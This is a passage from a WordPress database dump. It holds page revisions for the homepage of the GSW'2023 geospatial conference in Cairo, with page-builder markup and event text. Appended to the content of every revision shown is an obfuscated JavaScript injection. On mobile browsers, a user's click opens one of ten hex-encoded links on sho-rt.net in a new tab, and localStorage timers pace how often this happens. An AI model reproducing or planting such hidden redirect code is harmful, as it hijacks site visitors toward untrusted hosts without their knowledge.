)|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Home_n','','inherit','closed','closed','','3066-revision-v1','','','2022-11-09 15:04:00','2022-11-09 15:04:00','',3066,'https://gsw2023.com/?p=3124',0,'revision','',0),
(3125,1,'2022-11-09 15:04:31','2022-11-09 15:04:31','[vc_row][vc_column width=\"1/2\"][vc_column_text]\r\n<h3></h3>\r\n<h3>EGYPT GSW\'2023</h3>\r\n<h3>The First Geospatial Week in Africa and The Middle East</h3>\r\n[/vc_column_text][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005291201{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"right\"][/vc_column_inner][vc_column_inner width=\"3/4\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#3724e5\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1667948825977{margin-top: 25px !important;}\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text]\r\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo City stars Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\r\n[/vc_column_text][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]aaaaaaaaaaaaa\r\n\r\naaaaaaaaaaaa[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]aaaaaaaaaaaaa\r\n\r\naaaaaaaaaaaa[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]aaaaaaaaaaaaa\r\n\r\naaaaaaaaaaaa[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]aaaaaaaaaaaaa\r\n\r\naaaaaaaaaaaa[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3082\" img_size=\"799x452\"][/vc_column][/vc_row][vc_row][vc_column awb_type=\"image\" awb_stretch=\"1\" awb_image_background_size=\"contain\" awb_image_background_position=\"100% 100%\" awb_parallax=\"scroll\" awb_parallax_speed=\"0.5\" awb_image=\"3068\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"5\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^1900|url^https://gsw2023.com/wp-content/uploads/2018/06/trade10.jpg|caption^null|alt^null|title^trade10|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1529568771974{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION FEES\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]Opening of registration platform: soon[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][vc_column][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1665815238858{padding-top: 40px !important;padding-bottom: 40px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#ffffff\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"white\" style=\"shadow\" border_width=\"10\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#311b92\" tick_col=\"#ffffff\" tick_sep_col=\"#eeee22\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#eeee22\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row][vc_column][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Home_n','','inherit','closed','closed','','3066-revision-v1','','','2022-11-09 15:04:31','2022-11-09 15:04:31','',3066,'https://gsw2023.com/?p=3125',0,'revision','',0),
(3126,1,'2022-11-09 15:06:08','2022-11-09 15:06:08','[vc_row][vc_column width=\"1/2\"][vc_column_text]\r\n<h3></h3>\r\n<h3>EGYPT GSW\'2023</h3>\r\n<h3>The First Geospatial Week in Africa and The Middle East</h3>\r\n[/vc_column_text][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005291201{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"right\"][/vc_column_inner][vc_column_inner width=\"3/4\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#3724e5\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1667948825977{margin-top: 25px !important;}\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text]\r\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo City stars Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\r\n[/vc_column_text][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]aaaaaaaaaaaaa\r\n\r\naaaaaaaaaaaa[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]aaaaaaaaaaaaa\r\n\r\naaaaaaaaaaaa[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]aaaaaaaaaaaaa\r\n\r\naaaaaaaaaaaa[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]aaaaaaaaaaaaa\r\n\r\naaaaaaaaaaaa[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3082\" img_size=\"799x452\"][/vc_column][/vc_row][vc_row][vc_column awb_type=\"image\" awb_stretch=\"1\" awb_image_size=\"large\" awb_image_background_size=\"contain\" awb_image_background_position=\"50% 50%\" awb_parallax=\"scroll\" awb_parallax_speed=\"0.5\" awb_image=\"3068\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"5\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^1900|url^https://gsw2023.com/wp-content/uploads/2018/06/trade10.jpg|caption^null|alt^null|title^trade10|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1529568771974{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION FEES\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]Opening of registration platform: soon[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT 